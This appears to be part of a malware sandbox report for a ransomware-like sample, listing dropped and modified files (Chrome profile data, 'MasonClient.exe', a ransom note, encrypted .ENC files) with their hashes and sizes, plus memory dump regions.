SHA1
0ec4ed60801503bd3bae6cd8a9aa0029148b0854

SHA256
4105fb8a01752eebec9b26ffe7e29b60ed7217d353278ea17e1d5d833e7f21c9

SHA512
6ab2fd6849e2ba0b2e15e62e489183b3a57f181987c28186a6dea51e72ea24979e17dc3f6ae11c5d5804b4f98480dac620b689efc1a48092c651fd9575c579b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
ce144e8e1c7aa0790cb630d84d93607f

SHA1
67cb8b86fdf77d4b586132edcb9b4b9d7cdea285

SHA256
145937b219af832a40d26d67adf576694d9b8c2c9298b6fe42335065a4033958

SHA512
2d20fefee1e42af9f9e9ace9e8576122650d4b8be72ce2748510b25b04be5a0dbf4ca780df1d8044750988f382c28393aea29f144beaaa26a3a5c8ee03955f0c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
9e407139f5e4de5fbcdde5a2126bb78e

SHA1
72e11580f969a1842458504dd5cb0418b7282ea4

SHA256
81ccfbc3111b3d6e1fa8f2a7e3b36b3bc199b9e7c005224fd08efb92dc8ff1b6

SHA512
0ed782690fc8a6dfbec8750664cb5fa67157205410805a6faef2cf53775990a7e2875ec117b87a583e6bf0ac5dcc7bba225a4edd98ac14449b8f1ffdf5ee5679

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
b2fc89da3af587cb972571e00751e612

SHA1
87062fa552d49dca730af0034175f33980d43f87

SHA256
eae91abb56438f0aef364e38033da6c53c2820694defc956c88de33cf8ec1a12

SHA512
fcd347bc619896a3efbf8350bf6d708240037eb39d45c83976ab9d555c39b868acc5b410d4c9e844ee34b0ab48c55e79027840ef249a39d8f0a6a5a73f8702fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
352KB

MD5
e5a6f69400199f8ddd040f1b7c8f4d3d

SHA1
c8516618b42a14b488a6f1d28b8d65b1743fa06b

SHA256
8233daad19c815bc723ba80e6361c1054c95edb6c10eea7a64fca0180124e294

SHA512
60f2a689675965c98661887d6e89f35482ff87b232f2b2a639aee04d64c24ed9c3611aee169ad51c5bbd3e4afdfc5621f5da94adf01b009da0c2c9ab90eb74cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
170KB

MD5
ba70e39bd7336a50f18c663301b2c195

SHA1
54699ebb18bcee8765bdf2e146ccfe3d16b19b9c

SHA256
0bfd76470856b65960b3aec39abd609caf52bef1b6c7e81eaa96d7714115587b

SHA512
250749dc490592218ef467d91e6ad7089ecacce17fe362bd28bb7214fdaf7896b7e9c747240dca41a3985924a4672952a42fdc2797a2f39125188fb56a322f1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
370KB

MD5
d418062994bb9332363f0fa61e46ffef

SHA1
dbddbeb1b6082098dc629f10a67ddfc9089d41a0

SHA256
6294e75cd1876fa0aca5e340ce8bf7dc58b6ade9f367d826ca0a47b2b0f2eead

SHA512
f38c2c92d4bf162c9c4b318826d215a4417796d5706bde71e8a663998c60c26335588e9a2c04e672367a3ee43d34ccbe4e8957293da697afeb5e53cdf9c21ed1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
369KB

MD5
e26ba286cb62b87ad3a6ba475081513a

SHA1
036c988e6c3e63657eee2dd6e11c00fafbfd260c

SHA256
a00e135b5a3b67b74eb11509b52b0ea2c599cd9e7d49481415a00eab2684d294

SHA512
aba7184c187a5dd70ad8c8dadb79361e1c8e58c2ac5089bfa036ae9196451adb3ddbc157d86320d8a9ad580189a9fd3e015cbf8cc6d8c61def66fe536e4e140b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar41F7.tmp

Filesize
183KB

MD5
109cab5505f5e065b63d01361467a83b

SHA1
4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

SHA256
ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

SHA512
753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

Download Submit
C:\Users\Admin\AppData\Roaming\MasonClient.exe

Filesize
54KB

MD5
a51b3cb18641d1abd8cc9104e06e09c4

SHA1
2e656f9f2fff61c4e0594a4459fe945c07735bc7

SHA256
b19785992fe57f8f4ab7c7fc7d067a6d3c0832252afc5f13d6e165afefcff90b

SHA512
ae01bc88a59e3b90b0f6d684cbc05b62e57baf3fe68d75d08652e0006adb3d6000939c6e688ce28d4a603afdf1e80b6b1cb3d5e9abaef24938bb8da34a403b76

Download Submit
C:\Users\Admin\Desktop\How To Decrypt My Files.html

Filesize
724B

MD5
320517c54f4245df10a53f23e15ef629

SHA1
b7991388b4b1aee9f10fcd16bab3d7a7a5e4013a

SHA256
fd0bc4f04864dbd7d89c8eb185663bce7f16ad4800fa89f4a0adb640ae5f5f73

SHA512
ff00989e081603a9c902aea81ac9b3ca3a72b4db2c87a337b9be3ef79d1bad0a0c81776978c417b3ea3ccc0ac39e1bd7a07f5da2fdc5875612e2c7f27014d6f0

Download Submit
C:\Users\Admin\Documents\OutMeasure.xlsx.ENC

Filesize
12KB

MD5
e5d815b27a31c62e5a2c59824551d98f

SHA1
cea29f75e4a5ce60d971881114239f284338696e

SHA256
bfbbc31ee560692594e445fdae1f47fb4d09c4814b65dd93119308145d354433

SHA512
bf0deaab3340a3dfba71a6d13400d8d9ca3a3e610a0e78aa328e6d5aab35e1789a78fb902b14475d13c59d876e32121cb689a250189d9b3a99e5736fb910668c

Download Submit
C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.ENC

Filesize
16B

MD5
6983afc57cacbf89acd26f1dda850db4

SHA1
c6e7ec1431101d8ca96994fddd0b261505b5a8bd

SHA256
19501b427a662653196852d2a5cd986304b4ab8e3c87dbbb4fa0b50d377b73e9

SHA512
ed859caba5e94d911d3f7185e1b564e64fd8f0fb8299b359e12826bca1f149742bc6ae99a24a75360bdb2e7bd96a944b5bc0a82a9170bfbede324a4f951c01f6

Download Submit
memory/1488-6801-0x0000000001250000-0x0000000001264000-memory.dmp

Filesize
80KB

Download
memory/1740-2996-0x0000000000DF0000-0x0000000000E04000-memory.dmp

Filesize
80KB

Download
memory/1740-10316-0x0000000000A40000-0x0000000000A54000-memory.dmp

Filesize
80KB

Download
memory/2016-914-0x0000000000080000-0x0000000000094000-memory.dmp

Filesize
80KB

Download
memory/2364-70-0x000000001AF40000-0x000000001AFC0000-memory.dmp

Filesize
512KB

Download
memory/2364-0-0x000007FEF57C3000-0x000007FEF57C4000-memory.dmp

Filesize
4KB

Download
memory/2364-1-0x0000000000CF0000-0x0000000000D04000-memory.dmp

Filesize
80KB

Download
memory/2364-11-0x000000001AF40000-0x000000001AFC0000-memory.dmp

Filesize
512KB

Download
memory/2364-2499-0x000000001AC60000-0x000000001AC6E000-memory.dmp

Filesize
56KB

Download
memory/2364-12-0x000007FEF57C3000-0x000007FEF57C4000-memory.dmp

Filesize
4KB

Download
memory/2364-986-0x0000000002320000-0x000000000232C000-memory.dmp

Filesize
48KB

Download
memory/2684-5395-0x0000000000230000-0x0000000000244000-memory.dmp

Filesize
80KB

Download
memory/2716-9549-0x0000000000010000-0x0000000000024000-memory.dmp

Filesize
80KB

Download
memory/2748-6-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2748-7-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2748-8-0x00000000027A0000-0x00000000027A8000-memory.dmp

Filesize
32KB

Download
memory/2748-9-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download